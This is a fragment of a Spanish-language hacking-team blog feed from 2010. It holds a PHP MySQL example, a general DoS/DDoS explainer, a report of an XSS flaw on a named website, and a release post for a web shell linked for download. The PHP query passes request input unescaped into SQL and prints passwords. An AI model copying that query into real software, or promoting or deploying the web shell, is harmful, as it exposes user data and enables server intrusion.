/&gt;Code:&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #444444; color: black;"&gt;&amp;lt;?php&lt;br /&gt;function conectar($host,$user,$pass,$database) {&lt;br /&gt;$conectar = mysql_connect($host,$user,$pass) or die (mysql_error());&lt;br /&gt;mysql_select_db($database,$conectar);&lt;br /&gt;return $conectar;&lt;br /&gt;}&lt;br /&gt;$conexion = conectar("localhost","root","","alumnos");&lt;br /&gt;?&amp;gt;&lt;/div&gt;&lt;br /&gt;Bueno, pongamosle conect.php, un ejemplo de su uso en un codigo, seria el siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;include "conect.php";&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;$registro = mysql_query("select codigo,nombre,pass,mail&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;from alumnado where mail='$_REQUEST[mail]'",$conexion)&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;or die("problemas en select".mysql_error());&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;if($reg=mysql_fetch_array($registro))&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "Nombre: ".$reg['nombre'];&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "&amp;lt;br&amp;gt;";&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "Mail: ".$reg['mail'];&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "&amp;lt;br&amp;gt;";&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; echo "Pass: ".$reg['pass'];&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;}else {&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;echo "No";&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;mysql_close($conexion);&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #444444;"&gt;&lt;span style="background-color: #444444; color: black;"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-8487308230169757097?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/8487308230169757097/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/funcion-para-conectar-mysql.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8487308230169757097'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8487308230169757097'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/funcion-para-conectar-mysql.html' title='Funcion para conectar a MySql'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2891536734905547952</id><published>2010-08-09T02:02:00.000-07:00</published><updated>2010-08-09T16:57:43.800-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DDoS'/><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><title type='text'>Ataques DoS - DDoS</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Bueno, para entender que es un ataque DDoS,  primero debemos saber que es un ataque DoS.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;¿Que  es un ataque DoS ?&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Bueno, un servidor  (ya sea una web o un blog) esta preparado para soportar un numero de  conexiones simultaneas. Cuando excede el numero de estas conexiones  pueden llegar a pasar dos cosas:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;1) Que no responda a  mas peticiones entrantes&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;2) Que se desconecte  de la red (queda offline)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Entonces si un  ordenador, malintencionado, solicita un numero de peticiones mayores a  las que soporta nuestro servidor puede llegar a saturar los puertos  y  provocar que este deje de funcionar correctamente. Este es el ataque DoS  (Denial of service) que se traduce como denegacion de servicio&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://img697.imageshack.us/img697/2816/dosdesconexion.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://img697.imageshack.us/img697/2816/dosdesconexion.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Como se aprecia en la imagen el ordenador atacante satura al ordenador victima&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;(consumiendo sus recursos) y asi&lt;span class="Apple-style-span" style="font-size: small;"&gt; queda imposibilitado un ordenador comun  para acceder a la&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;web.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Los recursos que se consumen son acho de banda, &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;memoria ram, etc.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Tambien puede pasar que el ataque sea tan  excesivo (consuma demasiados recursos)&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;que el administrador de la web la desconecte de internet hasta que haya  pasado el ataque o hasta que lo haya logrado repelerlo.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://img192.imageshack.us/img192/8255/ataquedos.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://img192.imageshack.us/img192/8255/ataquedos.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;En la imagen, el servidor se esta desconectando de internet (no acepta ninguna conexion)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;entonces el DoS falla.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;¿Como se puede prevenir este ataque?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Bloqueando la Ip (del atacante, claro esta) desde la web&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Ataque DDoS&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Cuando el ataque se realiza desde un solo ordenador, es facil de bloquear, se detecta la IP y se&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;bloquea y listo pero existe una variante de el ataque DoS que es cuando se ataca al servidor de&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;distintos ordenadores distribuidos en diferentes puntos del mundo.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Este ataque DDos (distribute denial of service)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Denegacion de servicio distribuida&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, &lt;b style="color: red;"&gt;&lt;span style="font-size: small;"&gt;es una ampliacion de&lt;/span&gt;l&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; DoS.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Este tipo de ataque se lleva a cabo con ordenadores zombie, que son ordenadores comunes&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;controlados por un software o troyano (por una tercera persona) que permite manipularlos.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;De esta forma es posible coordinar un ataque de miles de ordenadores contra una web.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://img704.imageshack.us/img704/531/ataqueddoszombie.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://img704.imageshack.us/img704/531/ataqueddoszombie.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="Apple-style-span" style="color: red; font-family: Arial,Helvetica,sans-serif; font-weight: bold; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;¿Como defendernos de un DDoS?&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;si tienes un hosting compartido (como puede ser webcindario.com, etc), sera el host&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;quien se tendra que defender y no tu, ya que no tendras acceso al servidor atacado.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; Pero en cambio si te encuentras en un servidor dedicado/virtual (que sea tuyo completamente),&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;tendras que recurrir a diversas herramientas complejas no aptas para usuarios con escasos&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;conocimientos en esta area.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2891536734905547952?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2891536734905547952/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/ataques-ddos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2891536734905547952'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2891536734905547952'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/ataques-ddos.html' title='Ataques DoS - DDoS'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2370679828740679043</id><published>2010-08-07T19:44:00.000-07:00</published><updated>2010-08-07T19:44:32.819-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>XSS | www.village.com</title><content type='html'>Vulnerabilidad tipo XSS encontrada en la pagina &lt;a href="http://www.village.com/"&gt;www.village.com&lt;/a&gt;, este tipo de XSS no pasa los datos mediante la url, asi que no se puede hacer casi nada con esta vulnerabilidad..&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img825.imageshack.us/img825/2698/42651206.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img825.imageshack.us/img825/2698/42651206.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2370679828740679043?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2370679828740679043/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwvillagecom.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2370679828740679043'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2370679828740679043'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwvillagecom.html' title='XSS | www.village.com'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-7761490602678213837</id><published>2010-08-07T13:22:00.000-07:00</published><updated>2010-08-07T13:24:12.356-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='K0D4K'/><category scheme='http://www.blogger.com/atom/ns#' term='Proyectos'/><title type='text'>K0DAK Web Sh33LL! (1.0)</title><content type='html'>Hola gente, les dejo aqui la primer version de&lt;b style="color: red;"&gt; K0DAK Web Sh33ll!&lt;/b&gt;. Codeada por mi &lt;b style="color: red;"&gt;(Dr [F])&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Espero que les guste, se la dedico especialmente al team [H] Risk T [S], gracias por el apoyo que me brindan para seguir adelante, tambien les agradezco a &lt;a href="http://www.foro.portalhacker.net/"&gt;CPH&lt;/a&gt; y &lt;a href="http://foro.elhacker.net/"&gt;EL Hacker&lt;/a&gt;, dos grandes comunidades de las cuales he aprendido muchisimo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Caracteristicas de K0D4K  Web Sh3LL!:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;Idioma: Español&lt;/div&gt;&lt;div style="color: red;"&gt;Codigo  Abierto&lt;/div&gt;&lt;div style="color: red;"&gt;Diseño personalizado&lt;/div&gt;&lt;div style="color: red;"&gt;Vision de directorios&lt;/div&gt;&lt;div style="color: red;"&gt;Modificaciones  de Directorios&lt;/div&gt;&lt;div style="color: red;"&gt;Informacion del servidor &lt;/div&gt;&lt;div style="color: red;"&gt;Ejecutar comandos por consola (cmd -&amp;gt; Windows)&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;La puede descargar de &lt;b&gt;&lt;a href="http://www.megaupload.com/?d=D6W4XK3Z"&gt;AQUI&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;y El codigo fuente se los dejo en &lt;b&gt;&lt;a href="http://pastebin.com/wXguRqyv"&gt;PASTEBIN&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Aca les dejo algunas Screens:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img213.imageshack.us/img213/770/70315775.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="489" src="http://img213.imageshack.us/img213/770/70315775.jpg" width="640" /&gt;&lt;/a&gt;&lt;a href="http://img704.imageshack.us/img704/6058/85446391.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="490" src="http://img704.imageshack.us/img704/6058/85446391.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img225.imageshack.us/img225/9679/45353924.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="490" src="http://img225.imageshack.us/img225/9679/45353924.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img69.imageshack.us/img69/1466/51472863.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="490" src="http://img69.imageshack.us/img69/1466/51472863.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Un Saludo a todos los leectores&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-7761490602678213837?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/7761490602678213837/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-10.html#comment-form' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7761490602678213837'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7761490602678213837'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/k0dak-web-sh33ll-10.html' title='K0DAK Web Sh33LL! (1.0)'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image 